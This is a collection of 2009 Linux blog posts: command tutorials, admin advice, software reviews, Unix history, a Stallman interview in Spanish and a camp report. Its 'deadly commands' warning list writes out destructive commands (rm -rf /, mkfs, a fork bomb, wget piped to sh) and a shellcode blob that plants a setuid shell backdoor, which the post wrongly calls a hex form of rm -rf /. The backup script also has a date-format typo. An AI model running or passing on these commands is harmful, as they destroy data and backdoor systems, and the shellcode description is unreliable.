Wednesday, September 9, 2009

Yepa
Regards,

Jeronimo Calvo

Unix Xargs Piping Toolkit Utility

Xargs constructs an argument list for an arbitrary Unix command using
standard input and executes this command. xargs [options] [command]

The xargs command creates an argument list for command from standard
input. It is typically used with a pipe getting its input from
commands like ls and find The latter is probably the most common
source of xargs input and is covered in examples below.

One of the most common xargs applications in pipes is to execute a
command once for each piped record:

find . -name '*050106*' print | xargs -n2 grep 'From: Ralph'
cat iplist | xargs -n1 nmap -sV
The find command searches the entire directory structure for filenames
that contain 050106 . The xargs command executes grep command for each
two argument (so that filename was visible). In the second example cat
command supplies the list of IPs for map to scan.

In many Unix shells there is a limit to the number of arguments
allowed on a single command line. This is often a problem when you
analyze spam blocked by a spam filter. Here xargs can help: if the
argument list read by xargs is larger than the maximum allowed by the
shell, xargs will bundle the arguments into smaller groups and execute
command separately for each argument bundle.

If no command is specified, xargs works similar to the echo command
and prints the argument list to standard output.

Options
Option Description
-n# Execute command once for every # argument. For example, -n2
bundles arguments into groups of two or less and executes command on
each argument bundle.
-l# Execute command once for every # lines of input. For example, -l1
creates a bundle of arguments for every one line of input and executes
command on each argument bundle.
-i Normally xargs places input arguments at the end of command. Used
with the -i option, xargs will replace all instances of {} with input
arguments. You need to put them in single brackets or use a backslash
(\) before each bracket to keep the shell from interpreting the
special characters.
-t Echo each command before executing. Nice for debugging
-p Prompts the user before executing each command. Useful for debugging.

Examples
To use a command on files whose names are listed in a file, enter:
xargs lint -a < cfiles
If the cfiles file contains the following text:

main.c readit.c
gettoken.c
putobj.c
the xargs command constructs and runs the following command:

lint -a main.c readit.c gettoken.c putobj.c
If the cfiles file contains more file names than fit on a single shell
command line (up to LINE_MAX), the xargs command runs the lint command
with the file names that fit. It then constructs and runs another lint
command using the remaining file names. Depending on the names listed
in the cfiles file, the commands might look like the following:

lint -a main.c readit.c gettoken.c . . .
lint -a getisx.c getprp.c getpid.c . . .
lint -a fltadd.c fltmult.c fltdiv.c . . .

This command sequence is not quite the same as running the lint
command once with all the file names. The lint command checks
cross-references between files. However, in this example, it cannot
check between the main.c and the fltadd.c files, or between any two
files listed on separate command lines.

For this reason you may want to run the command only if all the file
names fit on one line. To specify this to the xargs command use the -x
flag by entering:
xargs -x lint -a <cfiles
If all the file names in the cfiles file do not fit on one command
line, the xargs command displays an error message.


To construct commands that contain a certain number of file names, enter:
xargs -t -n 2 diff <<EOF
starting chap1 concepts chap2 writing
chap3
EOF
This command sequence constructs and runs diff commands that contain
two file names each (-n 2):
diff starting chap1
diff concepts chap2
diff writing chap3
The -t flag causes the xargs command to display each command before
running it, so you can see what is happening. The <<EOF and EOF
pattern-matching characters define a here document, which uses the
text entered before the end line as standard input for the xargs
command.


To insert file names into the middle of command lines, enter:
ls | xargs -t -I {} mv {} {}.old
This command sequence renames all files in the current directory by
adding .old to the end of each name. The -I flag tells the xargs
command to insert each line of the ls directory listing where {}
(braces) appear. If the current directory contains the files chap1,
chap2, and chap3, this constructs the following commands:
mv chap1 chap1.old
mv chap2 chap2.old
mv chap3 chap3.old

To run a command on files that you select individually, enter:
ls | xargs -p -n 1 ar r lib.a
This command sequence allows you to select files to add to the lib.a
library. The -p flag tells the xargs command to display each ar
command it constructs and to ask if you want to run it. Enter y to run
the command. Press the any other key if you do not want to run the
command.
Something similar to the following displays:

ar r lib.a chap1 ?...
ar r lib.a chap2 ?...
ar r lib.a chap3 ?...

To construct a command that contains a specific number of arguments
and to insert those arguments into the middle of a command line,
enter:
ls | xargs -n6 | xargs -I{} echo {} - some files in the directory
If the current directory contains files chap1 through chap10, the
output constructed will be the following:

chap1 chap2 chap3 chap4 chap5 chap6 - some files in the directory
chap7 chap8 chap9 chap10 - some file in the directory
Typically arguments are lists of filenames passed to xargs via a pipe.
Please compare:

$ ls 050106*
$ ls 050106* | xargs -n2 grep "From: Ralph"
In the first example list of files that starts with 050106 is printed.
In the second for each two such files grep is executed.
Additional Examples
John Meister's UNIX Notes

Change permissions on all regular files in a directory subtree to mode
444, and permissions on all directories to 555:

find -type f -print | xargs chmod 444

$ ls * | xargs -n2 head -10
line 1 of f1 line 2 of f1 line 3 of f1

ls * } xarg -n1 wc -1

(date +%D ; du -s ~) | xargs >> log

ls *.txt | xargs -i basename \{\} .ascii \
| xargs -i mv \{\}.ascii \{\}.ask

(Note that the backslash usage)


Another example. Let's "cat" the Contents of Files Listed in a File,
in That Order.

$ cat file_of_files
file1
file2

$ cat file1
This is the data in file1

$ cat file 2
This is the data in file2
So there are 3 files here "file_of_files" which contains the name of
other files. In this case "file1" and "file2". And the contents of
file1" and "file2" is shown above.


$ cat file_of_files | xargs cat
This is the data in file1
This is the data in file2

What if you want to find a string in all finds in the current
directory and below. Well the following script will do it.

#!/bin/sh
SrchStr=$1
shift
for i in $*; do
find . -name "$i" -type f -print | xargs egrep -n "$SrchStr"/dev/null
done
Another quite nice thing, used for updating CVS/Root files on a Zaurus:
find . -name Root | xargs cp newRoot
Just copies the contents of newRoot into every Root file. I think this
works too:

find . -name Root | xargs 'echo user@machine.dom:/dir/root >'

as long as the quote are used to avoid the initial interpretation of the >.

These pieces of randomness will look for all .sh files in PWD and
print the 41st line of each - don't ask me why I wanted to know.
Thanks to Brian R for these.

for f in *.sh; do sed -n '41p' $f; done
or

ls *.sh | xargs -l sed -n '41p' Remove all the files in otherdir that
exist in thisdir.
ls -1d ./* | xargs -i rm otherdir/{}

Thursday, September 3, 2009

Tech Tip: Get Notifications from Your Scripts with notify-send

Notify-send is a great application for notifying you when an event has occurred. An event such as a script running to completion.

If notify-send is not installed on your machine already, install the package "libnotify1" (or possibly just "libnotify") from your repositories.

Once installed you can simply type the following, at the command line, to display a pop-up message near your system tray:

notify-send "hello"

By default the message will be displayed for 5 seconds. To change how long a message stays displayed use the "-t" switch. This will change, in milliseconds, how long the message is displayed. Enter "-t 0" to leave the message up until the user closes it.

notify-send "This message will be displayed for 3 seconds" -t 3000
notify-send "Click me to close me." -t 0

You can even add a title and an icon to the notification.

notify-send "This is the Title" \
"Check out the cool icon" \
-i /usr/share/pixmaps/gnome-terminal.png

When used in a script you could set it to notify you periodically by placing the command in a loop:

#!/bin/bash

while [ 1 ]; do
notify-send "Up Time" "`uptime`"
sleep 5m
done
__________________________

UBUNTU LINKS

Ubuntu-related links:

Community Support
GetDeb - Ubuntu Linux
Paid Support
Planet Ubuntu
Psychocats Resources
Report A Problem
ShipIt
The Fridge
Ubuntu
Ubuntu Archives
Ubuntu brainstorm
Ubuntu Documentation
Ubuntu Download
Ubuntu Forums
Ubuntu Hardware Support
Ubuntu News
Ubuntu Spotlight
Ubuntu Training
Ubuntu Tutorials
Ubuntu Wiki
Using APT
What Is Ubuntu?

Extra links useful in Ubuntu:
Gnome Themes
Nautilus Scripts

Wednesday, September 2, 2009

Finding Files On The Command Line

One of the things I like about Linux is the command line. I have used nautilus, gnome-commander, konqueror, kommander, dolphin and thunar to manage files in Linux and these file managers are great for what they do. But there are times when one simply wants to find a file when working on the command line without having to open a GUI application.

From the find man page:

GNU find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence until the outcome is known at which point find moves on to the next file name.

Find empty directories:

find /path -depth -type d -empty

Find empty files:

find /path -depth -type f -empty

Find a file with a specific name:

find /path -name name_of_file

Find a files with specific extensions:

find /path -name "*.given_extension"

Find files with specific permissions which have a ".txt. file extension:

find /path -name '*.txt' -perm 644

Find files with some given permissions:

find /path -perm -permision_bits

Find files with a given name and any extension:

find /path -name 'given_name.*'

Find files modified in the latest blocks of 24 hours:

Find files that were accessed in the latest blocks of 24 hours:

find -atime n

Where n is:

  • 0 for the last 24 hours
  • 1 for the last 48 hours
  • 2 for the last 72 hours

Find files according to owner:

find /path -user root

One can also pipe find commands to the xargs command to execute commands on files.

Find and delete files:

find /path -name mytestfile | xargs rm

See man find and man xargs for more information about these powerful commands.

Many new Linux users are intimidated by the command line and this feeling should be overcome from the onset because the command line can be faster and more powerful than most GUI applications.


An alternative way to find and delete files using only find.

find /path -name mytestfile -exec rm '{}' \;

Everything between -exec and \; get executed per file, and '{}' is replaced with the name of the file found.

This can be used to do just about anything with files. So for example, find and delete all CVS folders in a project:

find /path -name CVS -type d -exec rm -r '{}' \;

Create and md5 hash of all files in a folder

find /home/williamb/ -type f -exec md5sum '{}' \;

Thursday, August 27, 2009

10 Common Mistakes Made by New Linux Administrator

As Linux squeezes itself into all facets of technology, more people are being forced to use it who have little knowledge of the foreign Unix land. Maybe you're trying to learn your way around, or maybe you're the Windows guy who just got 'promoted' to maintaining the Linux system; either way, things are odd, and you just really, really don't want to fubar the system. For those of you who fall into that category, this article is for you. Below are fifteen mistakes often made by new Linux administrators.

1. Failing To Use CheckInstall

Linux uses package managers, which keep everything installed on your system updated and clean. When two or more apps rely on each other, it is imperative that all of them are kept updated, not just a few. Thus, when you install one program via whatever package manager your distro uses but another from source, the package manager will only update the first, which could cause things to stop working properly.

The solution to this is to use Checkinstall to build a package for your system that will stay updated along with the other software, which will save you headaches in the future.

2. Refusal to Use the Command Line Interface

You just have to learn it. It's that simple. You cannot be a sysadmin in any system while harboring a fear of the command line, but that is doubly true in Linux. While you can manage to do most things with some form of a GUI, it is almost always faster and easier to learn how to do it from the Terminal. Learn some bash already.

3. Having No or Weak Root Password

Someone getting their hands on the root password is like some crony gaining control of Darth Vader's big laser that blew up Alderaan. If you have no root password, then you're either a very ripe sysadmin, or you're an idiot. If you have a weak one, then you're naive. Here is a very big tip: if you don't have a password, set one RIGHT NOW; if it is a simple word, especially a word in the dictionary, change it RIGHT NOW to something at least fourteen characters long with uppercase, lowercase, numbers, and symbols.

4. Pretending Updates Don't Exist

For whatever reason, people don't like updates. That is understandable if you're getting fed them day after day, but really--updates keep things working (most of the time). Sometimes it is laziness--there may be hundreds of updates if you put it off for awhile, and no one likes to pick through those, so they just put it off longer and longer until something stops working. You must update. If you disable auto-updates, then check them every day. Sift through them each time and only install the ones you need. Do this every time. Your install will thank you.

5. Making Changes Without Backing Up First

If you're going to pick through, for example, the resolution config file to try and get your three monitor system running properly, you really should backup the file first. This goes for all changes in tweaks. In fact, just go ahead and create a backup of every major file right now, just so when you forget later, your fore sight will have saved you from FUBAR hell.

6. Not Learning to Trouble Shoot Their System

Each distro is like a baby--they are similar on the surface, but when you spend time with them, there are noticeable differences. For that reason, it is very important that you spend time with your distro and learn its own peculiarities. Want an example? One user who had messed up his Ubuntu resolution was freaking out because his screen was scrambled, and he was trying to fix it from command line. That seems fine, except that if he'd spent time knowing his system, he'd of simply booted into recovery mode and reset his resolution to default. Knowledge is not only power, but it's a time saver, too.

7. Ignoring Logs like the Plague

See, there's these little things inside /var/logs called LOGS that tell you magical things about your system, like errors and security issues. These things give you valuable information that can be used to correct programs and head off unfortunate issues. Doing so will make your life as admin much, much easier. So then, why do you ignore these? Out of fear? Trepidation? Misplaced respect? Open the system logs once in awhile and see what's up, okay?

8. Keeping Everything in One Giant Partition

Of course, this is only valid if you're the one doing the installing. You don't want everything to sit in one partition for many reasons, two of which being performance and convenience. You're probably going to change distros at some point, so to make your life easier, put your home directory in a different partition than the rest. This will make your life easier at some point, trust me.

9. Using as Root

Image from xkcd.com

For you Window's users, that means Admin. You're not supposed to run as admin, nothing good ever comes from it. When using the terminal, simply use 'su' or 'sudo' or whatever your system command is for running as root. This is more than powerful enough for the things you must do.

10. Asking Help From Random People

If Linux has been thrust upon you and you're left trying to pick your way through things that mean nothing to you, then no one will blame you for seeking help when issues arise. With that said, be careful who you seek help from, and be very weary of what you run through the Terminal. There are people who get their kicks from making your life hell. Get the help of a pro when things go bad.

*Update: A special thank you to all readers who have brought to our attention that the Sudo image was not attributed correctly to xkcd.com. This has now been rectified. In the future we will ensure all images are attributed to the correct source. - Laptoplogic.com team

Wednesday, August 26, 2009

Richard Stallman: No se salvan ni Ubuntu, ni Firefox ni las redes sociales

from Sun Bloggers by

El gurú del software libre, Richard Stallman, de visita en la Argentina, cargó contra las redes sociales, los gigantes Google y Microsoft, contra Firefox y hasta contra la más popular versión del Linux actual, Ubuntu.

Con Buenos Aires como sede, la quinta edición de este evento anual, llamado “Wikimanía”, comenzará este miércoles 26 y se extenderá hasta el 28 de agosto. Es la primera vez que la conferencia se organiza en un país de habla hispana. Además, será bilingüe y tendrá un costo de acreditación de US$ 60.

La Fundación Wikimedia es la encargada de la organización de la quinta conferencia internacional que reúne a la comunidad y público interesado en proyectos colaborativos. El lugar de encuentro será el Teatro San Martín de Buenos Aires y contará con la presencia de Richard Stallman, una de las principales figuras del movimiento de software libre, y de Jimmy Wales, el fundador de Wikipedia.

Esta es la primera edición de Wikimanía que se llevará a cabo en un país de habla hispana y en el Hemisferio Sur, y ya se confirmó la asistencia de “wikimaníacos” de todo el mundo. Las cuatro ediciones anteriores del evento tuvieron lugar en: Frankfurt (Alemania), Boston (USA), Taipei (Taiwán) y Alejandría (Egipto).

La Wikimania es uno de los mayores eventos de tecnología, Internet y cultura digital en red del mundo. Durante tres días, se reúnen miles de participantes que comparten inquietudes, intercambian experiencias y coordinan acciones en torno al Internet colaborativo, las nuevas tecnologías y los proyectos de Wikipedia, la enciclopedia virtual libre.

Stallman será uno de los oradores principales.

Stallman es un hombre que no necesita presentación dentro del mundo del código abierto.

Para los que no se encuentran al tanto de su reputación, Stallman fundó el GNU Project en el año 1983, y siempre ha sido un defensor a rajatabla del software libre y sin restricciones.

En entrevista para el diario la Nación, Stallman se despachó contra todos: redes sociales, Microsoft, Google, incluso contra la distribución más popular de GNU/Linux, Ubuntu, y el browser de software libre, Firefox.

Windows 7: Tiene todas las cosas malévolas de Windows Vista, puede tener menos errores pero para mí los errores son algo secundario, para mí se trata de abusar del usuario.

Windows tiene tres tipos de funciones malévolas: envía mensajes diciendo lo que hace el usuario, restringe al usuario en cuanto a lo que puede hacer con la máquina y hace cambios sin pedir la aprobación del supuesto dueño de la máquina.

Google: Hace varias cosas y prefiero juzgar a cada cosa por separado, hay varios servicios los que no les veo ningún problema especifico, pero hay otros en los que los usuarios no se dan cuenta que están instalando software privativo, su navegador lo hace invisiblemente, no avisa que está descargando una aplicación privativa pero lo hacen. Esta aplicación se llama, en la jerga, JavaScript .

Es posible que todos los servicios de Google transmitan programas privativos pero algunos siguen funcionando sin necesidad de activarlos. El motor de búsqueda, por ejemplo, sigue funcionando sin JavaScript. Gmail usualmente se usa con una aplicación privativa con JavaScript, tiene otro sin Javascript pero no se usa mucho, está en la frontera, es apenas aceptable. Hay servicios como Google Docs que no funcionan en absoluto sin este tipo de complementos.

Quizás tiene alguna aplicación 100% limpia pero no conozco a todos. Sin embargo, Google Earth exige la instalación explicita de un programa privativo, no está escondido y no se debe usar.

Redes sociales: No me gustan como son. No las probé porque no tengo tiempo para tales cosas Pero la idea de la red social como concepto no me parece mala en sí misma, el problema es que la mayoría de estos servicios presentan una imagen falsa de privacidad y deberían actuar honestamente.

Deberían advertir al usuario del peligro de que cada cosa que diga en el sitio llegue a ser pública porque esto es muy posible. Lo que hacen es sugerir que si prefieres podes mostrar la información sólo a los amigos pero no te dejan en claro que ellos le pueden comentar a los demás y así llegan al gran público.

Firefox: Hoy en día es software libre pero sugiere plugins privativos, nosotros ofrecemos Icecat , un browser que no sugiere software privativo y es muy importante, un programa privativo no es ético. Sugerir su uso como si fuese una solución es afirmar que no es un problema.

Ubuntu: No ayuda a la gente a valorar su libertad. Ellos podrían haber ayudado al movimiento pero no lo hicieron.

Fuente : urgente24.com

Sunday, August 23, 2009

Audacious 2.1 Review - Powerful Audio Replacement for XMMS

Audacious is a powerful audio player for Linux which resembles the older XMMS, only using GTK2 toolkit for its interface. It supports XMMS and implicitly Winamp 2.x skins, coming with support for various audio formats, including MP3, Ogg Vorbis, FLAC (Free Lossless Audio Codec) or WMA (Windows Media Audio).


Audacious was forked from Beep Media Player, which was also based on XMMS but development was discontinued in 2006. Audacious is currently maintained and the latest version was released in July this year. For a tutorial on installing the latest release in Ubuntu 9.04, check out this tutorial I've put up a while ago.

The version I used for this review is 2.1 as it comes included currently in the Ubuntu 9.10 Karmic repositories. Audacious comes with the typical, simple interface some of you are used from XMMS. It includes a main window with regular play/pause/stop and volume buttons, a 10-band equalizer and the playlist itself.

The playlist can be arranged easily to display various fields, like only the artist, album, song title and duration, but it can also be sorted by title, album, artist, filename, path, date, track number or (the default) playlist entry. Adding a large collection of music to the playlist can take a very long time, but once they're loaded, Audacious will prove very fast.

Aside from skins and equalizer, this player really comes bundled with a lot of features: visualizations, simple tag editor, a playlist manager, but the true power of Audacious is support for plugins. It comes with a huge number of plugins, which include Last.fm song submission, alarm, GNOME shortcuts, global shortcuts, status icon for Pidgin, and not only those. Plugins really turn it into a more useful, powerful experience. Local cover art fetching should not be forgotten either.


Regarding configurability, Audacious is very rich. It allows you to select which output plugin it will use, configure the replay gain, customise its appearance by installing new skins, configure playback, also offering a rich variety of options for the playlist.


Audacious is a wonderful player, and it will fit those who like XMMS or users who switched from Windows and are used to Winamp. Also, it takes a different approach than players who share a common interface like Rhythmbox, Banshee or Exaile.

Font : http://tuxarena.blogspot.com/2009/08/audacious-21-review-powerful-audio.html

How to copy / clone user account in Linux?

Task: Copy / clone user account, so the both users have the very same settings in their user home directory.

Copying of the user's home directory (e.g. olduser) to new user (e.g. newuser) is easy:
1. Create new user: adduser newuser
2. Copy all special hidden (dot) files to new user's home directory: cp --recursive /home/olduser/.[a-zA-Z0-9]* /home/newuser
3. Copy other standard files to new user directory: cp --recursive /home/olduser/* /home/newuser
4. Set new user's directory and files owner to new user for hidden dot files: chown --recursive newuser:users /home/newuser/.*
5. Set new user's directory and files owner to new user for normal files: chown --recursive newuser:users /home/newuser/*

You are done. In some cases you would need to change user group (users in this case).

Now just logout and try to login as the new user. All the settings for the programs should be the very same as for the old user. You can for example compare the settings by running KDE and checking the wallpaper and other settings of the new user. If the copying of the user folder was successful, everything will look the same.

FONT: http://www.ambience.sk/user-account-copy-linux

MOVING YOUR HOME DIRECTORY

Having the “/home” directory tree on it’s own partition has several advantages, the biggest perhaps being that you can reinstall the OS (or even a different distro of Linux) without losing all your data. You can do this by keeping the /home partition unchanged and reinstalling the OS which goes in the “/” (root) directory, which can be on a seperate partition.

But you, like me, did not know this when you first installed Ubuntu, and have not created a new partition for “/home” when you first installed Ubuntu. Despair not, it is really simple to move “/home” to its own partition.

First, create a partition of sufficient size for your “/home” directory. You may have to use that new hard drive, or adjust/resize the existing partition on your current hard-drive to do this. Let me skip those details.

Next, mount the new partition:
$mkdir /mnt/newhome
$sudo mount -t ext3 /dev/hda5 /mnt/newhome

(You have to change the “hda5″ in the above to the correct partition label for the new partition. Also, the above assumes that the new partition you created is formatted as an ext3 partition. Change the “ext3″ to whatever filesystem the drive is formatted to.)

Now, Copy files over:
Since the “/home” directory will have hardlinks, softlinks, files and nested directories, a regular copy (cp) may not do the job completely. Therefore, we use something we learn from the Debian archiving guide:
$cd /home/
$find . -depth -print0 | cpio --null --sparse -pvd /mnt/newhome/

Make sure everything copied over correctly. You might have to do some tweaking and honing to make sure you get it all right, just in case.

Next, unmount the new partition:
$sudo umount /mnt/newhome

Make way for the new “home”
$sudo mv /home /old_home

Since we moved /home to /old_home, there is no longer a /home directory. So first we should recreate a new /home by:
sudo mkdir /home

Mount the new home:
$sudo mount /dev/hda5 /home
(Again, you have to change “hda5″ to whatever the new partition’s label is.)

Cursorily verify that everything works right.

Now, you have to tell Ubuntu to mount your new home when you boot. Add a line to the “/etc/fstab” file that looks like the following:

/dev/hda5 /home ext3 nodev,nosuid 0 2
(Here, change the partition label “hda5″ to the label of the new partition, and you may have to change “ext3″ to whatever filesystem you chose for your new “home”)

Once all this is done, and everything works fine, you can delete the “/old_home” directory by using:
$sudo rm -r /old_home

Michael, Russ and Magnus posted this solution on the ubuntu-users mailing list a few months ago.


FONT: http://embraceubuntu.com/2006/01/29/move-home-to-its-own-partition/

How to Simple Backup

Many computer users realize how invaluable a backup scheme can be and most linux distros already include the required software for a simple backup scheme. I am going to show you how to write a simple bash script that will archive specified files in your home directory and add the date/time to the filename of the archive. A GUI backup application is great for folks are comfortable with GUI apps. However, those types of apps are, in my opinion, overkill for simple backups.

Creating the backup script
Go to a console, or open a terminal emulator if you happen to be in a GUI environment.

Change directories to a path where you want to store the script. I keep all bash scripts in a "bin" directory in my home directory, this keeps things a bit more organized. You should create a bin directory in your home directory if it doesn't already exist.
cd $HOME/bin

Create a new file.
touch mybackups.sh

Open your favorite text editor and add the below code to the new file. I have included comments to show how the script can be personalized, text appearing in red is emphasized to show areas that you may want to change but is still part of the script. Lines 2 - 8 can be omitted but I feel this information should always be included in scripts for obvious reasons.

#!/bin/bash
# Filename:
# Version:
# Date:
# Author:
# License:
# Requires:
# Description:

# Change directories to /home
cd /home

# Archive all files in $HOME
# Change /target/path to your desired target path
# Certain files can be excluded from the archive with --exclude=filename
tar -cjf /target/path/temp.tar.bz2 --exclude=*gvfs $USER

# Check for a previous backup with identical filename
# Change /target/path to your desired target path
# Change date +%Y%m%d to your desired date/time; see man date
# Change backups as needed
if [ -e /target/path/$(date +%Y%m%d)-backups.tar.bz2 ]
then
rm /target/path/$(date +%Y%m%)-backups.tar.bz2
fi

# Move the archive
# Change /target/path to your desired target path
# Change date +%Y%m%d to your desired date/time; see man date
# Change backups as needed
mv /target/path/temp.tar.bz2 /target/path/$(date +%Y%m%d)-backups.tar.bz2

# Done
exit

Automation
A very important point needs to be made here. As important as backups are, any backup scheme is pretty much useless unless it's scheduled in some way. Imagine needing to restore from a backup only to find that the backup is several months old. It's quite easy to add a backup script like the one above to a cronjob so the backup is created on a timely basis, I run the above script in a daily cronjob. For a tutorial on cronjobs, please see my Crontab Tutorial.

Conclusion
That's it. This script can be executed with sh mybackups.sh after which you should have a new archive located in /target/path. I have two hard drives in all of my computers - the second hard drive is used to store files such as backups.

I like this type of script because it's simple - it's only 9 lines of code if you omit the comments - and can be edited as the user desires. Again, this type of script, like any backup scheme, should be used with some type of automation to make scheduled backups without user intervention - a cronjob is a great idea for this script. For a tutorial on cronjobs, please see my Crontab Tutorial.

FONT: http://ardchoille42.blogspot.com/2009/08/how-to-simple-backups.html

Friday, August 21, 2009

Solaris tip of the week: use mdb to view process stack

The solaris pstack command can be used to view most user process stacks, but I recently encountered a situation where even the pstack -F could not be used to view the process stack.

I issued a zfs recv operation that never returned.

# ps -ef | grep zfs

root 7485 7484 0 01:40:01 ? 0:00 zfs recv -F storage ...

# pstack -F 7485

[no output]

pstack could not grab control the process to display the stack.

My next option is to use mdb to view the stack - no quite as convenient as pstack, but more powerful ... here are the steps:

# mdb -k

/* get handle to the the zfs process using ::pgrep */

>::pgrep zfs

S PID PPID PGID SID UID FLAGS ADDR NAME
R 7485 7484 7484 7484 0 0x4a004000 ffffff278437ca88 zfs

/* use the returned ADDR value to get the process threadlist */

> ffffff278437ca88::threadlist
ADDR PROC LWP CMD/LWPID
ffffff278437ca88 ffffff21da3b68e0 0 /239

/* use the PROC value to view the stack */

> ffffff21da3b68e0::findstack
stack pointer for thread ffffff21da3b68e0: ffffff00f88fc880
[ ffffff00f88fc880 _resume_from_idle+0xf1() ]
ffffff00f88fc8b0 swtch+0x160()
ffffff00f88fc960 turnstile_block+0x764()
ffffff00f88fc9d0 rw_enter_sleep+0x1a3()
ffffff00f88fca40 dsl_dataset_clone_swap+0x61()
ffffff00f88fca90 dmu_recv_end+0x57()
ffffff00f88fcc40 zfs_ioc_recv+0x31e()
ffffff00f88fccc0 zfsdev_ioctl+0x10b()
ffffff00f88fcd00 cdev_ioctl+0x45()
ffffff00f88fcd40 spec_ioctl+0x83()
ffffff00f88fcdc0 fop_ioctl+0x7b()
ffffff00f88fcec0 ioctl+0x18e()
ffffff00f88fcf10 sys_syscall32+0x101()

40 years of Unix

By Mark Ward
Technology Correspondent, BBC News

Network cables, BBC
Unix had computer networking built in from the start

The computer world is notorious for its obsession with what is new - largely thanks to the relentless engine of Moore's Law that endlessly presents programmers with more powerful machines.

Given such permanent change, anything that survives for more than one generation of processors deserves a nod.

Think then what the Unix operating system deserves because in August 2009, it celebrates its 40th anniversary. And it has been in use every year of those four decades and today is getting more attention than ever before.

Work on Unix began at Bell Labs after AT&T, (which owned the lab), MIT and GE pulled the plug on an ambitious project to create an operating system called Multics.

The idea was to make better use of the resources of mainframe computers and have them serve many people at the same time.

"With Multics they tried to have a much more versatile and flexible operating system, and it failed miserably," said Dr Peter Salus, author of the definitive history of Unix's early years.

Time well spent

The cancellation meant that two of the researchers assigned to the project, Ken Thompson and Dennis Ritchie, had a lot of time on their hands. Frustrated by the size and complexity of Multics but not its aims of making computers more flexible and interactive, they decided to try and finish the work - albeit on a much smaller scale.

The commitment was helped by the fact that in August 1969, Ken Thompson's wife took their new baby to see relatives on the West Coast. She was due to be gone for a month and Thompson decided to use his time constructively - by writing the core of what became Unix.

He allocated one week each to the four core components of operating system, shell, editor and assembler. It was during that time and after as the growing team got the operating system running on a DEC computer known as a PDP-7 that Unix came into being.

It got us away from the total control that businesses like IBM and DEC had over us
Peter Salus, author

By the early 1970s, five people were working on Unix. Thompson and Ritchie had been joined by Brian Kernighan, Doug McIlroy and Joe Ossanna.

The name was reportedly coined by Brian Kernighan - a lover of puns who wanted Unics to stand in contrast to its forebear Multics.

The team got Unix running well on the PDP7 and soon it had a long list of commands it could carry out. The syntax of many of those commands, such as chdir and cat, are still in use 40 years on. Along with it came the C programming language.

But, said Dr Salus, it wasn't just the programming that was important about Unix - the philosophy behind it was vital too.

"Unix was created to solve a few problems," said Dr Salus, "the most important of which was to have something that was much more compact than the operating systems that were current at that time which ran on the dinosaurs of the computer age."

Net benefits

Back in the early 1970s, computers were still huge and typically overseen by men in white coats who jealously guarded access to the machines. The idea of users directly interacting with the machine was downright revolutionary.

"It got us away from the total control that businesses like IBM and DEC had over us," said Dr Salus.

Word about Unix spread and people liked what they heard.

"Once it had jumped out of the lab and out of AT&T it caught fire among the academic community," Dr Salus told the BBC. What helped this grassroots movement was AT&T's willingness to give the software away for free.

DEC PDP-1 computer
DEC's early computers were for many years restricted to laboratories

That it ran on cheap hardware and was easy to move to different machines helped too.

"The fact that its code was adaptable to other types of machinery, in large and small versions meant that it could become an operating system that did more than just run on your proprietary machine," said Dr Salus.

In May 1975 it got another boost by becoming the chosen operating system for the internet. The decision to back it is laid out in the then-nascent Internet Engineering Task Force's document RFC 681, which notes that Unix "presents several interesting capabilities" for those looking to use it on the net.

It didn't stop there. Unix was adapted for use on any and every computer from mainframes to desktops. While it is true that it did languish in the 1980s and 90s as corporations scrapped over whose version was definitive, the rise of the web has given it new life.

The wars are over and the Unix specification is looked after by the Open Group - an industry body set up to police what is done in the operating system's name.

Now Unix, in a variety of guises, is everywhere. Most of the net runs on Unix-based servers and the Unix philosophy heavily influenced the open source software movements and the creation of the Linux desktop OS. Windows runs the communication stack created for Unix. Apple's OS X is broadly based on Unix and it is possible to dig into that software and find text remarkably similar to that first written by Dennis Ritchie in 1971.

"The really nice part is the flexibility and adaptability," said Dr Salus, explaining why it is so widespread and how its ethic fits with a world at home with the web.

"Unix is the best screwdriver ever built," said Dr Salus.

The 7 Deadly Linux Commands

If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

Camping and Hacking at HAR2009


HAR2009 logo

On Monday 10 August evening I arrived under a light drizzle in Vierhouten in the Netherlands, after cycling the last 100km section of the 300km that I had traveled from the University of Koblenz. I just had time for a beer and a soup, as the c-base bus arrived from Berlin. Night was falling fast, and so we all got together and helped put up the large colorful tent on the edge of a still mostly empty field. The BSD camp next to us had worked out how to get some electricity and kindly let us have enough to power a lamp and a couple of laptops. So we could relax and listen to some music, as it got colder.

I travel very light weight on my bicycle for obvious reasons. So I don't carry a tent with me. Instead I go from hotel, to youth hostel, to family couch. I have not tried the Couch surfing network yet, but it's an extra option I could use. Here on the camp, in the middle of the forest, none of the options were available. So I was very grateful to Dirk Höschen for having taken a nice tent with him for me to sleep in, and also to Rasta for having given me some blankets and furs he happened to have to sleep on. The thick down coat I had carried with me from France, finally came in useful, in the cold nights that followed.

C-base tent at HAR2009
